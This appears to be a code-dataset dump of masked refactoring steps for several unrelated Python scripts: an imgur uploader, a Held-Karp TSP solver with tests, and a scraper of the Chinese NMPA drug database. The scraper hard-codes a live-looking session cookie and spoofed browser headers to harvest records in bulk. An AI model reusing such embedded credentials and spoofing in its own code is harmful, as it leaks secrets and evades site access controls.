"step-4": "from postimg import postimg\nimport argparse\nimport pyperclip\nimport json\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Post/upload image on imgur.com', epilog=\n 'link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help=\n 'Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help=\n 'html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help=\n 'reddit markdown code of imgur url')\n parser.add_argument('-q', '--quiet', action='store_true', help=\n 'print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print('Error: Interrupted by user!!')\n",
"step-5": "#!/usr/bin/env python\nfrom postimg import postimg\nimport argparse\nimport pyperclip\nimport json\ndef main(args):\n if not args.quiet:\n print(\"Uploading.....\")\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(',', ': ')))\n print(\"Unable to upload !!!\")\n return None\n link = resp['data']['link']\n if args.github:\n link = ''%link\n elif args.reddit:\n link = '[Reddit](%s)'%link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">'%link\n pyperclip.copy(link)\n print(link)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')\n parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print(\"Error: Interrupted by user!!\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import urllib3
import json
def download(url):
print('Downloading ', url)
userAgent = 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'
userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'
AcceptLanguage ='zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
AcceptEncoding= 'gzip, deflate'
Accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'
http = urllib3.PoolManager(num_pools=5, headers={'User-Agent': userAgent,'Accept - Language': AcceptLanguage,
'Accept-Encoding': AcceptEncoding ,'Accept':Accept,
'Proxy-Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Cookie':Cookie})
r = http.request('GET', url)
print(r.status)
html = r.data.decode()
return html
if __name__ == '__main__':
demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'
demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'
demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='
for i in range(1,10):
demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'
ss = download(demoURL)
print(ss)
data = json.loads(ss)
for item in data:
# searchK = item['COUNT']
searchK = item['ID']
print(item['CONTENT'])
detailInfoJson = download(demoDetailUrl + str(searchK))
detailInfo = json.loads(detailInfoJson)
detailJson = '{'
for detail in detailInfo:
if detail['NAME'] != '注':
detailJson = detailJson + '"' + detail['NAME'] + '":"' + detail['CONTENT'] + '",'
detailJson = detailJson[:-1]
detailJson = detailJson + '}'
print(detailJson)
detailData = json.loads(detailJson)
# print(item['CONTENT'])
|
normal
|
{
"blob_id": "9d302ff2de8280bd8786794cdd533107d2a458bc",
"index": 5611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n )\n for i in range(1, 10):\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='\n + str(i) + '&pageSize=1500')\n ss = download(demoURL)\n print(ss)\n data = json.loads(ss)\n for item in data:\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'\n ] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n",
"step-4": "import urllib3\nimport json\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n )\n for i in range(1, 10):\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='\n + str(i) + '&pageSize=1500')\n ss = download(demoURL)\n print(ss)\n data = json.loads(ss)\n for item in data:\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'\n ] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n",
"step-5": "import urllib3\nimport json\ndef download(url):\n print('Downloading ', url)\n userAgent = 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n AcceptLanguage ='zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding= 'gzip, deflate'\n Accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n\n Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent': userAgent,'Accept - Language': AcceptLanguage,\n 'Accept-Encoding': AcceptEncoding ,'Accept':Accept,\n 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Cookie':Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n\n for i in range(1,10):\n demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'\n ss = download(demoURL)\n\n print(ss)\n data = json.loads(ss)\n for item in data:\n # searchK = item['COUNT']\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n # print(item['CONTENT'])\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
umur = raw_input("Berapakah umurmu?")
tinggi = raw_input("Berapakah tinggimu?")
berat = raw_input("Berapa beratmu?")
print "Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r." % (umur, tinggi, berat)
|
normal
|
{
"blob_id": "7d2335c956776fc5890a727d22540eabf2ea4b94",
"index": 5862,
"step-1": "umur = raw_input(\"Berapakah umurmu?\")\ntinggi = raw_input(\"Berapakah tinggimu?\")\nberat = raw_input(\"Berapa beratmu?\")\n\nprint \"Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r.\" % (umur, tinggi, berat)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def held_karp_bottomup(distance_matrix):
"""
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
"""
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
for i in xrange(n):
dp[i][(1 << n) - 1] = d[i][0]
for visited in reversed(xrange((1 << n) - 1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_j = d[i][j] + dp[j][visited | 1 << j]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n) - 1:
for j in xrange(n):
if not visited & 1 << j:
cost_from_j = dp[j][visited | 1 << j]
if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
path.append(j)
i, visited = j, visited | 1 << j
cost_from_i = cost_from_j
break
path.append(0)
return ans, path
class Vertex:
""" Simple implementation of a point in Euclidean space """
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
<|reserved_special_token_0|>
def adjacency_matrix(graph):
"""
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
"""
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
"""
Solution to TSP using the Bellman-Held-Karp Algorithm
Given the adjacency matrix to a corresponding tsp problem, find the
minimum cost Hamiltonian cycle through the graph, as well as the
corresponding path
"""
d = distance_matrix
n = len(d)
def f(i, visited, path_so_far):
"""
Let f(i, visited, path_so_far) be the path of minimum distance from
city i to city 0, that passes through all remaining unvisited cities in
`visited`, where visited is a bitmask such that the bit in the jth
position being 1 represents city j having been visited, and bit j
being 0 represents city j having not been visited, and `path_so_far` is
the current path of minimum distance from city 0 up to city i.
Then the solution we want is f(0, 0, []), and the following recursive
relation holds:
f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
NOTE: Must be careful not to mutate
"""
if visited == (1 << n) - 1:
return d[i][0], path_so_far + [0]
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_from_j, path_with_j = f(j, visited | 1 << j,
path_so_far + [j])
dist_with_j = d[i][j] + dist_from_j
if dist_with_j < min_dist:
min_dist = dist_with_j
min_path = path_with_j
return min_dist, min_path
return f(0, 0, [])
def held_karp_topdown(distance_matrix):
"""
Above algorithm, but making use of memoization to avoid recomputing
overlapping subproblems
"""
d = distance_matrix
n = len(d)
"""
We need a dp table that will store the minimum distances from city i
to city 0 that passes through all unvisitied cities in the bit mask.
There are n cities, and 2^n possible binary strings of length n, so our
table will have dimensions n x 2^n
With this approach, we use another table called 'child' that keeps track
of the child city of i for each combination of (i, visited), and we can
use this table to obtain the actual Hamiltonian cycle of minimum distance.
"""
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
child = [[None for i in xrange(2 ** n)] for j in xrange(n)]
def f(i, visited):
"""
f is defined as in the purely recursive implementation above.
The only difference here is that we check if the value we are
looking for is already in the defined dp table, and we do not
keep track of the path as we go along, as looking up a solution
for any given value would require having stored the path for
that solution as well, which would be expensive.
As such, we use the `child` table to keep track of where we
came from.
"""
if dp[i][visited]:
return dp[i][visited]
if visited == (1 << n) - 1:
dp[i][visited] = d[i][0]
child[i][visited] = 0
return d[i][0]
min_dist = sys.maxint
chosen_j = None
for j in xrange(n):
if not 1 << j & visited:
dist_with_j = d[i][j] + f(j, 1 << j | visited)
if dist_with_j < min_dist:
min_dist = dist_with_j
chosen_j = j
dp[i][visited] = min_dist
child[i][visited] = chosen_j
return min_dist
ans = f(0, 1)
path = [0]
i, visited = 0, 1
next_ = child[i][visited]
while next_ is not None:
path.append(next_)
visited |= 1 << next_
next_ = child[next_][visited]
return ans, path
def held_karp_bottomup(distance_matrix):
"""
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
"""
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
for i in xrange(n):
dp[i][(1 << n) - 1] = d[i][0]
for visited in reversed(xrange((1 << n) - 1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_j = d[i][j] + dp[j][visited | 1 << j]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n) - 1:
for j in xrange(n):
if not visited & 1 << j:
cost_from_j = dp[j][visited | 1 << j]
if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
path.append(j)
i, visited = j, visited | 1 << j
cost_from_i = cost_from_j
break
path.append(0)
return ans, path
class Vertex:
""" Simple implementation of a point in Euclidean space """
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def distance(v1, v2):
""" Euclidean distance between two `Vertex` instances """
return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5
def adjacency_matrix(graph):
"""
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
"""
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
"""
Solution to TSP using the Bellman-Held-Karp Algorithm
Given the adjacency matrix to a corresponding tsp problem, find the
minimum cost Hamiltonian cycle through the graph, as well as the
corresponding path
"""
d = distance_matrix
n = len(d)
def f(i, visited, path_so_far):
"""
Let f(i, visited, path_so_far) be the path of minimum distance from
city i to city 0, that passes through all remaining unvisited cities in
`visited`, where visited is a bitmask such that the bit in the jth
position being 1 represents city j having been visited, and bit j
being 0 represents city j having not been visited, and `path_so_far` is
the current path of minimum distance from city 0 up to city i.
Then the solution we want is f(0, 0, []), and the following recursive
relation holds:
f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
NOTE: Must be careful not to mutate
"""
if visited == (1 << n) - 1:
return d[i][0], path_so_far + [0]
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_from_j, path_with_j = f(j, visited | 1 << j,
path_so_far + [j])
dist_with_j = d[i][j] + dist_from_j
if dist_with_j < min_dist:
min_dist = dist_with_j
min_path = path_with_j
return min_dist, min_path
return f(0, 0, [])
def held_karp_topdown(distance_matrix):
"""
Above algorithm, but making use of memoization to avoid recomputing
overlapping subproblems
"""
d = distance_matrix
n = len(d)
"""
We need a dp table that will store the minimum distances from city i
to city 0 that passes through all unvisitied cities in the bit mask.
There are n cities, and 2^n possible binary strings of length n, so our
table will have dimensions n x 2^n
With this approach, we use another table called 'child' that keeps track
of the child city of i for each combination of (i, visited), and we can
use this table to obtain the actual Hamiltonian cycle of minimum distance.
"""
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
child = [[None for i in xrange(2 ** n)] for j in xrange(n)]
def f(i, visited):
"""
f is defined as in the purely recursive implementation above.
The only difference here is that we check if the value we are
looking for is already in the defined dp table, and we do not
keep track of the path as we go along, as looking up a solution
for any given value would require having stored the path for
that solution as well, which would be expensive.
As such, we use the `child` table to keep track of where we
came from.
"""
if dp[i][visited]:
return dp[i][visited]
if visited == (1 << n) - 1:
dp[i][visited] = d[i][0]
child[i][visited] = 0
return d[i][0]
min_dist = sys.maxint
chosen_j = None
for j in xrange(n):
if not 1 << j & visited:
dist_with_j = d[i][j] + f(j, 1 << j | visited)
if dist_with_j < min_dist:
min_dist = dist_with_j
chosen_j = j
dp[i][visited] = min_dist
child[i][visited] = chosen_j
return min_dist
ans = f(0, 1)
path = [0]
i, visited = 0, 1
next_ = child[i][visited]
while next_ is not None:
path.append(next_)
visited |= 1 << next_
next_ = child[next_][visited]
return ans, path
def held_karp_bottomup(distance_matrix):
"""
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
"""
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
for i in xrange(n):
dp[i][(1 << n) - 1] = d[i][0]
for visited in reversed(xrange((1 << n) - 1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_j = d[i][j] + dp[j][visited | 1 << j]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n) - 1:
for j in xrange(n):
if not visited & 1 << j:
cost_from_j = dp[j][visited | 1 << j]
if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
path.append(j)
i, visited = j, visited | 1 << j
cost_from_i = cost_from_j
break
path.append(0)
return ans, path
class Vertex:
""" Simple implementation of a point in Euclidean space """
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def distance(v1, v2):
""" Euclidean distance between two `Vertex` instances """
return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5
def adjacency_matrix(graph):
"""
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
"""
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
def main():
g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]
m1 = adjacency_matrix(g1)
for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):
cost, path = solver(m1)
assert cost == 16.0
assert path == [0, 2, 1, 3, 0]
g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]
m2 = adjacency_matrix(g2)
for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):
cost, path = solver(m2)
assert abs(cost - 15.7733871) < 0.001
assert path == [0, 3, 1, 2, 4, 0]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
"""
Solution to TSP using the Bellman-Held-Karp Algorithm
Given the adjacency matrix to a corresponding tsp problem, find the
minimum cost Hamiltonian cycle through the graph, as well as the
corresponding path
"""
d = distance_matrix
n = len(d)
def f(i, visited, path_so_far):
"""
Let f(i, visited, path_so_far) be the path of minimum distance from
city i to city 0, that passes through all remaining unvisited cities in
`visited`, where visited is a bitmask such that the bit in the jth
position being 1 represents city j having been visited, and bit j
being 0 represents city j having not been visited, and `path_so_far` is
the current path of minimum distance from city 0 up to city i.
Then the solution we want is f(0, 0, []), and the following recursive
relation holds:
f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
NOTE: Must be careful not to mutate
"""
if visited == (1 << n) - 1:
return d[i][0], path_so_far + [0]
min_dist = sys.maxint
for j in xrange(n):
if not 1 << j & visited:
dist_from_j, path_with_j = f(j, visited | 1 << j,
path_so_far + [j])
dist_with_j = d[i][j] + dist_from_j
if dist_with_j < min_dist:
min_dist = dist_with_j
min_path = path_with_j
return min_dist, min_path
return f(0, 0, [])
def held_karp_topdown(distance_matrix):
"""
Above algorithm, but making use of memoization to avoid recomputing
overlapping subproblems
"""
d = distance_matrix
n = len(d)
"""
We need a dp table that will store the minimum distances from city i
to city 0 that passes through all unvisitied cities in the bit mask.
There are n cities, and 2^n possible binary strings of length n, so our
table will have dimensions n x 2^n
With this approach, we use another table called 'child' that keeps track
of the child city of i for each combination of (i, visited), and we can
use this table to obtain the actual Hamiltonian cycle of minimum distance.
"""
